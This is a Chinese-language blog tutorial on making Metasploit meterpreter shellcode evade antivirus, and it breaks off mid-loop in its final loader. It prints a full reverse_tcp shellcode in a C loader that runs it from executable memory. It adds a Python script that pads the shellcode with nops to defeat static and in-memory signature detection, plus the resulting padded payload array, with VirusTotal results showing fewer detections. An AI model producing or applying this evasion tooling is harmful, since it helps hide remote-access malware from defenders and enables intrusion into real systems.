
浅谈meterpreter免杀

合天网安实验室 发布时间:2019-01-25 20:00:00 ,浏览量:0

01

前言

最近研究了一下免杀,学到了不少技巧。免杀基本就那么几个套路:静态文件特征码免杀、内存特征码免杀、行为免杀、流量免杀等等。本文只讨论前两种,也就是改变 shellcode 的字节特征。

02

正文

首先用 msfvenom 生成一个 payload(`-f c` 表示以 C 数组形式输出):`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<yourip> LPORT=<yourport> -f c`

以下是最原始的 meterpreter 加载器:先用 VirtualAlloc 申请一块可读、可写、可执行(RWX)的内存,把 shellcode 复制进去,再把指针强转成函数指针调用即可。

#include <windows.h>
#include <string.h>

/*
 * Raw msfvenom windows/meterpreter/reverse_tcp stage exactly as emitted by
 * "-f c": 341 payload bytes, stored as a string literal, so sizeof(buf) is
 * 342 (the compiler appends a NUL).  The payload appears to have been built
 * for LHOST 127.0.0.1 / LPORT 4444 (the "\x68\x7f\x00\x00\x01" and
 * "\x68\x02\x00\x11\x5c" pushes form a sockaddr_in for 127.0.0.1:4444).
 */
unsigned char buf[] =

"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"

"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"

"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"

"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"

"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"

"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"

"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"

"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"

"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"

"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"

"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"

"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01"

"\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"

"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"

"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"

"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"

"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"

"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"

"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"

"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"

"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"

"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"

"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

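/*
 * Minimal shellcode loader: allocate one RWX region, copy the payload in,
 * and call it through a function pointer.  Nothing here changes the payload
 * bytes, so this loader is what the static-signature discussion below is
 * measured against.  Note the allocate-RWX / copy / indirect-call sequence
 * itself is a well-known loader pattern, independent of payload encoding.
 *
 * Returns 0 if the payload returns, 1 if the allocation fails.
 */
int main(void) {
    /* sizeof(buf) already includes the literal's trailing NUL; the +1 is a
     * harmless extra byte kept from the original. */
    void *ptr = VirtualAlloc(NULL, sizeof(buf) + 1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (ptr == NULL) {
        return 1;   /* do not memcpy into / jump to a NULL page */
    }

    memcpy(ptr, buf, sizeof(buf));

    /* Transfer control to the staged bytes. */
    ((void (*)(void))ptr)();

    return 0;
}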

这个原始版本的加载器效果很不理想:

丢到 VirusTotal 会发现 70 个杀软里有 22 个能检测出来。我们现在把 shellcode 编码一下。这里不使用 msf 自带的编码器:msf 的编码器不只是给 shellcode 编码,还会把解密代码放在 shellcode 前面,所以编码方式很受限制;而现在 shellcode 在我们自己手里,只需要自己实现解密代码即可,不必把它塞进 shellcode 里,也就没有那样的限制,想怎么搞就怎么搞。并且如果不用公开的编码方式效果更好,比如把 shellcode 的每个字节都加一,或者做异或加密,这样就能绕过静态特征码。但加载到内存里解密以后,杀软仍然能在内存中找到特征码。于是我想了一个办法:在每条汇编指令之间插入一条不影响堆栈平衡的 nop 指令,把特征码"隔断"。下面是我用 Python 写的脚本,大致逻辑是:先在 capstone 的反汇编结果里找出所有以立即数为目标的相对跳转/调用指令(jmp eax、call ebp 这类间接跳转不需要处理),把目标字节偏移换算成指令下标并在目标指令前加上标号,再把跳转指令的立即数改写成跳转到标号,最后插入 nop 并用 keystone 重新编译——汇编器会自动重算位移,省去了手工校准跳转地址的时间。脚本如下,大哥们可以自取。用这个脚本把 shellcode 处理完会发现,报毒的杀软少了好几个,之前 Defender 识别出的 meterpreter 字眼也没有了。需要注意的是,这一步只改变了字节序列:加载器申请 RWX 内存、拷贝、再以函数指针调用的行为并没有变化,行为层面的检测不受影响。

from capstone import*

from keystone import*

controlflow=["jmp","jz","jnz","je","jne","call","jl","ja","loop","jecxz","jle","jge","jg","jp","jnl"]

registers=["eax","ebx","edx","ebp","esp","edi","esi"]

asm="cld ;call0x88;pushal ;mov ebp, esp;xor eax, eax;mov edx, dword ptr fs:[eax +0x30];mov edx, dword ptr [edx + 0xc];mov edx, dword ptr [edx +0x14];mov esi, dword ptr [edx + 0x28];movzx ecx, word ptr [edx +0x26];xor edi, edi;lodsb al, byte ptr [esi];cmp al, 0x61;jl 0x25;subal, 0x20;ror edi, 0xd;add edi, eax;loop 0x1e;push edx;push edi;movedx, dword ptr [edx + 0x10];mov ecx, dword ptr [edx + 0x3c];mov ecx,dword ptr [ecx + edx + 0x78];jecxz 0x82;add ecx, edx;push ecx;movebx, dword ptr [ecx + 0x20];add ebx, edx;mov ecx, dword ptr [ecx +0x18];jecxz 0x81;dec ecx;mov esi, dword ptr [ebx + ecx*4];add esi,edx;xor edi, edi;lodsb al, byte ptr [esi];ror edi, 0xd;add edi,eax;cmp al, ah;jne 0x4f;add edi, dword ptr [ebp - 8];cmp edi, dwordptr [ebp + 0x24];jne 0x45;pop eax;mov ebx, dword ptr [eax + 0x24];addebx, edx;mov cx, word ptr [ebx + ecx*2];mov ebx, dword ptr [eax +0x1c];add ebx, edx;mov eax, dword ptr [ebx + ecx*4];add eax, edx;movdword ptr [esp + 0x24], eax;pop ebx;pop ebx;popal ;pop ecx;popedx;push ecx;jmp eax;pop edi;pop edi;pop edx;mov edx, dword ptr[edx];jmp 0x15;pop ebp;push 0x3233;push 0x5f327377;push esp;push0x726774c;mov eax, ebp;call eax;mov eax, 0x190;sub esp, eax;pushesp;push eax;push 0x6b8029;call ebp;push 0xa;push 0x100007f;push0x5c110002;mov esi, esp;push eax;push eax;push eax;push eax;inceax;push eax;inc eax;push eax;push 0xe0df0fea;call ebp;xchg eax,edi;push 0x10;push esi;push edi;push 0x6174a599;call ebp;test eax,eax;je 0xe4;dec dword ptr [esi + 8];jne 0xcb;call 0x14b;push 0;push4;push esi;push edi;push 0x5fc8d902;call ebp;cmp eax, 0;jle 0x12c;movesi, dword ptr [esi];push 0x40;push 0x1000;push esi;push 0;push0xe553a458;call ebp;xchg eax, ebx;push ebx;push 0;push esi;pushebx;push edi;push 0x5fc8d902;call ebp;cmp eax, 0;jge 0x144;popeax;push 0x4000;push 0;push eax;push 0x300f2f0b;call ebp;pushedi;push 0x614d6e75;call ebp;pop esi;pop esi;dec dword ptr [esp];jne0xaf;jmp 0xdf;add ebx, eax;sub esi, eax;jne 0x10b;ret ;mov ebx,0x56a2b5f0;push 0;push ebx;call ebp"

asmarray=asm.split(";")

length=len(asmarray)

def assemble(code):
    """Assemble 32-bit x86 text with Keystone.

    Args:
        code: assembly source; instructions separated by ";" and labels of
            the form ``name:`` are accepted by Keystone.

    Returns:
        The machine code as a list of hex strings (``hex()`` style, e.g.
        ``"0x90"``, not zero-padded -- the C-array printer relies on this),
        or ``-1`` after printing the Keystone error when ``code`` does not
        assemble.  Callers must check for that sentinel.
    """
    try:
        engine = Ks(KS_ARCH_X86, KS_MODE_32)
        encoding, _count = engine.asm(code)
    except KsError as err:
        print(err)
        return -1
    return list(map(hex, encoding))

# The same 341-byte msfvenom windows/meterpreter/reverse_tcp stage as the C
# listing above; this is what gets disassembled to compute instruction
# boundaries.  Split into 15-byte rows to match the "-f c" output.
CODE = (
    b"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
    b"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
    b"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
    b"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
    b"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
    b"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
    b"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
    b"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
    b"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
    b"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
    b"\x77\x26\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54"
    b"\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x7f\x00\x00\x01"
    b"\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50"
    b"\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5"
    b"\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67"
    b"\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff"
    b"\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00"
    b"\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56"
    b"\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58"
    b"\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5"
    b"\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85"
    b"\x70\xff\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1"
    b"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5"
)

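def byteoffset2index(offset, code=None, disassembler=None):
    """Map a byte offset inside the shellcode to an instruction index.

    Branch targets in the Capstone listing are absolute byte offsets.  Once
    ``nop`` padding is inserted those offsets are meaningless, so each target
    is converted to the index (into ``asmarray``) of the instruction that
    starts there, and later replaced by a label.

    Args:
        offset: byte offset into the shellcode; 0 is the first instruction.
        code: bytes to disassemble; defaults to the module-level ``CODE``.
        disassembler: Capstone ``Cs`` object; defaults to the module-level
            ``md`` created in the ``__main__`` block.

    Returns:
        Index of the instruction that begins at ``offset``.  An offset equal
        to the total code length yields the instruction count (one past the
        last index), as the original implementation did.

    Raises:
        ValueError: if ``offset`` is negative, falls inside an instruction,
            or lies beyond the end of ``code``.  The original silently
            returned None in these cases, which only surfaced later as an
            unrelated TypeError when indexing ``asmarray``.
    """
    if code is None:
        code = CODE
    if disassembler is None:
        disassembler = md
    if offset < 0:
        raise ValueError("negative offset %r" % (offset,))
    if offset == 0:
        # The original loop could never return for offset 0 (it subtracted
        # the first instruction's length before testing for zero).
        return 0

    consumed = 0
    # enumerate from 1: after consuming k instructions the next one has index k.
    for index, insn in enumerate(disassembler.disasm(code, 0x0), start=1):
        consumed += len(insn.bytes)
        if consumed == offset:
            return index
        if consumed > offset:
            raise ValueError("offset 0x%x is not on an instruction boundary" % offset)
    raise ValueError("offset 0x%x is past the end of the code" % offset)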

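if __name__ == "__main__":
    # Kept at module level on purpose: byteoffset2index() reads this global
    # when no disassembler is passed in.
    md = Cs(CS_ARCH_X86, CS_MODE_32)

    # 1. Find every branch that targets an immediate byte offset.  Indirect
    #    branches ("jmp eax", "call ebp") still work after padding and are
    #    left alone.  Whole-token matching replaces the original substring
    #    tests, which double-counted "je"/"jecxz" and "jl"/"jle" and relied
    #    on "ecx" being missing from `registers` so it would not mask jecxz.
    branches = []
    for idx, insn in enumerate(asmarray):
        parts = insn.split(None, 1)
        if len(parts) != 2:
            continue  # no operand (cld, pushal, ret, ...)
        mnemonic, operand = parts[0], parts[1].strip()
        # Every jcc is relative, so accept any "j*" in addition to the list.
        is_branch = mnemonic in controlflow or mnemonic.startswith("j")
        if is_branch and operand.startswith("0x"):
            branches.append(idx)

    # 2. Convert each byte-offset target to an instruction index *before*
    #    any text is rewritten, so the "0x" lookup still finds the operand.
    targets = [
        byteoffset2index(int(asmarray[i][asmarray[i].index("0x"):], 16))
        for i in branches
    ]

    # 3. Label each target instruction once ("a<idx>:"), then re-point every
    #    branch at its label so Keystone recomputes the displacement.  A
    #    branch that is itself a target becomes "a<n>:jne a<m>", which the
    #    "0x" slice below still handles (labels contain no "0x").
    for tgt in set(targets):
        asmarray[tgt] = "a%d:%s" % (tgt, asmarray[tgt])
    for idx, tgt in zip(branches, targets):
        head = asmarray[idx][:asmarray[idx].index("0x")]
        asmarray[idx] = head + "a%d" % tgt

    # 4. Insert one "nop" between every pair of instructions and re-assemble.
    obfuscation = "nop"
    code = (";" + obfuscation + ";").join(asmarray)
    encoding = assemble(code)
    if encoding == -1:
        # assemble() already printed the Keystone error; do not emit garbage.
        raise SystemExit(1)

    # Emit a C initializer in the same "{0xfc, 0x90, ...}" layout str(list)
    # produced in the original (hex() values, not zero-padded).
    print("unsigned char buf[]={" + ", ".join(encoding) + "};")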

运行后复制输出的 unsigned char 数组。注意:下面贴出的数组里有几处指令与上面脚本的直接输出并不一致(例如 xor eax, eax 变成了 mov eax, 0,dec ecx 变成了 sub ecx, 1,sub al, 0x20 变成了 add al, 0xe0),看起来在插入 nop 之外还做了等价指令替换,自行复现时得到的字节会略有不同。

然后在 VS2010 里新建工程,源代码如下(加载器与前面的基本相同,只是 shellcode 换成了处理后的数组,并用循环代替 memcpy 逐字节拷贝):

voidmain(){

unsignedcharbuf[]={0xfc, 0x90, 0xe8, 0xce, 0x0, 0x0, 0x0, 0x90, 0x60, 0x90, 0x89,0xe5, 0x90, 0xb8, 0x0, 0x0, 0x0, 0x0, 0x90, 0x64, 0x8b, 0x50, 0x30,0x90, 0x8b, 0x52, 0xc, 0x90, 0x8b, 0x52, 0x14, 0x90, 0x8b, 0x72,0x28, 0x90, 0xf, 0xb7, 0x4a, 0x26, 0x90, 0xbf, 0x0, 0x0, 0x0, 0x0,0x90, 0xac, 0x90, 0x3c, 0x61, 0x90, 0x7c, 0x4, 0x90, 0x4, 0xe0, 0x90,0xc1, 0xcf, 0xd, 0x90, 0x1, 0xc7, 0x90, 0xe2, 0xec, 0x90, 0x52, 0x90,0x57, 0x90, 0x8b, 0x52, 0x10, 0x90, 0x8b, 0x4a, 0x3c, 0x90, 0x8b,0x4c, 0x11, 0x78, 0x90, 0xe3, 0x71, 0x90, 0x1, 0xd1, 0x90, 0x51,0x90, 0x8b, 0x59, 0x20, 0x90, 0x1, 0xd3, 0x90, 0x8b, 0x49, 0x18,0x90, 0xe3, 0x5c, 0x90, 0x83, 0xe9, 0x1, 0x90, 0x8b, 0x34, 0x8b,0x90, 0x1, 0xd6, 0x90, 0xbf, 0x0, 0x0, 0x0, 0x0, 0x90, 0xac, 0x90,0xc1, 0xcf, 0xd, 0x90, 0x1, 0xc7, 0x90, 0x38, 0xe0, 0x90, 0x75, 0xf2,0x90, 0x3, 0x7d, 0xf8, 0x90, 0x3b, 0x7d, 0x24, 0x90, 0x75, 0xd3,0x90, 0x58, 0x90, 0x8b, 0x58, 0x24, 0x90, 0x1, 0xd3, 0x90, 0x66,0x8b, 0xc, 0x4b, 0x90, 0x8b, 0x58, 0x1c, 0x90, 0x1, 0xd3, 0x90, 0x8b,0x4, 0x8b, 0x90, 0x1, 0xd0, 0x90, 0x89, 0x44, 0x24, 0x24, 0x90, 0x5b,0x90, 0x5b, 0x90, 0x61, 0x90, 0x59, 0x90, 0x5a, 0x90, 0x51, 0x90,0xff, 0xe0, 0x90, 0x5f, 0x90, 0x5f, 0x90, 0x5a, 0x90, 0x8b, 0x12,0x90, 0xe9, 0x4c, 0xff, 0xff, 0xff, 0x90, 0x5d, 0x90, 0x68, 0x33,0x32, 0x0, 0x0, 0x90, 0x68, 0x77, 0x73, 0x32, 0x5f, 0x90, 0x54, 0x90,0x68, 0x4c, 0x77, 0x26, 0x7, 0x90, 0x89, 0xe8, 0x90, 0xff, 0xd0,0x90, 0xb8, 0x90, 0x1, 0x0, 0x0, 0x90, 0x29, 0xc4, 0x90, 0x54, 0x90,0x50, 0x90, 0x68, 0x29, 0x80, 0x6b, 0x0, 0x90, 0xff, 0xd5, 0x90,0x6a, 0xa, 0x90, 0x68, 0x7f, 0x0, 0x0, 0x1, 0x90, 0x68, 0x2, 0x0,0x11, 0x5c, 0x90, 0x89, 0xe6, 0x90, 0x50, 0x90, 0x50, 0x90, 0x50,0x90, 0x50, 0x90, 0x83, 0xc0, 0x1, 0x90, 0x50, 0x90, 0x83, 0xc0, 0x1,0x90, 0x50, 0x90, 0x68, 0xea, 0xf, 0xdf, 0xe0, 0x90, 0xff, 0xd5,0x90, 0x97, 0x90, 0x6a, 0x10, 0x90, 0x56, 0x90, 0x57, 0x90, 0x68,0x99, 0xa5, 0x74, 0x61, 0x90, 0xff, 0xd5, 0x90, 0x85, 0xc0, 0x90,0x74, 0xe, 0x90, 0xff, 0x4e, 0x8, 0x90, 0x75, 0xe4, 0x90, 0xe8, 
0x93,0x0, 0x0, 0x0, 0x90, 0x6a, 0x0, 0x90, 0x6a, 0x4, 0x90, 0x56, 0x90,0x57, 0x90, 0x68, 0x2, 0xd9, 0xc8, 0x5f, 0x90, 0xff, 0xd5, 0x90,0x83, 0xf8, 0x0, 0x90, 0x7e, 0x4e, 0x90, 0x8b, 0x36, 0x90, 0x6a,0x40, 0x90, 0x68, 0x0, 0x10, 0x0, 0x0, 0x90, 0x56, 0x90, 0x6a, 0x0,0x90, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0x90, 0xff, 0xd5, 0x90, 0x93,0x90, 0x53, 0x90, 0x6a, 0x0, 0x90, 0x56, 0x90, 0x53, 0x90, 0x57,0x90, 0x68, 0x2, 0xd9, 0xc8, 0x5f, 0x90, 0xff, 0xd5, 0x90, 0x83,0xf8, 0x0, 0x90, 0x7d, 0x37, 0x90, 0x58, 0x90, 0x68, 0x0, 0x40, 0x0,0x0, 0x90, 0x6a, 0x0, 0x90, 0x50, 0x90, 0x68, 0xb, 0x2f, 0xf, 0x30,0x90, 0xff, 0xd5, 0x90, 0x57, 0x90, 0x68, 0x75, 0x6e, 0x4d, 0x61,0x90, 0xff, 0xd5, 0x90, 0x5e, 0x90, 0x5e, 0x90, 0xff, 0xc, 0x24,0x90, 0xf, 0x85, 0x2f, 0xff, 0xff, 0xff, 0x90, 0xe9, 0x74, 0xff,0xff, 0xff, 0x90, 0x1, 0xc3, 0x90, 0x29, 0xc6, 0x90, 0x75, 0xa9,0x90, 0xc3, 0x90, 0xbb, 0xf0, 0xb5, 0xa2, 0x56, 0x90, 0x6a, 0x0,0x90, 0x53, 0x90, 0xff, 0xd5};

BYTE*sc=(BYTE*)VirtualAlloc(NULL,sizeof(buf)+1,MEM_COMMIT,PAGE_EXECUTE_READWRITE);

//memcpy(sc,buf,sizeof(buf));

for(inti=0;i
